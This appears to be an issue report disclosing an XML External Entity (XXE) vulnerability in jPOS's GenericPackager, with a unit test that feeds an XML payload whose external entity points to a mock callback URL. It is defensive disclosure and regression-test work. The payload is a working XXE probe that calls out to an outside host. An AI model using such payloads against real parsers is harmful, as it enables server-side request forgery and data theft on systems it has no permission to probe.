XXE vulnerability in GenericPackager #462
Description
GenericPackager (as well as GenericValidatingPackager) are vulnerable to XML External Entity (XEE) attack.
Here is the test example that reproduces it
@Test
public void testXXEAttach() {
try {
String xeeAttackXml = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n"
+ "<!DOCTYPE foo [\n"
+ " <!ELEMENT foo ANY >\n"
+ " <!ENTITY xxe SYSTEM \"https://jposxee.free.beeceptor.com/hacked\" >]>\n"
+ "<foo>&xxe;</foo>";
new GenericPackager().readFile(new ByteArrayInputStream(xeeAttackXml.getBytes()));
fail("Expected ISOException to be thrown");
} catch (ISOException ex) {
assertEquals("Entity extension is disabled", ex.getMessage(), "ex.getMessage()");
}
}The xxe entity is getting resolved and request goes to https://jposxee.free.beeceptor.com/hacked (it's just a mock API):
It's not a finalized test that you can check in, but it gives you the idea.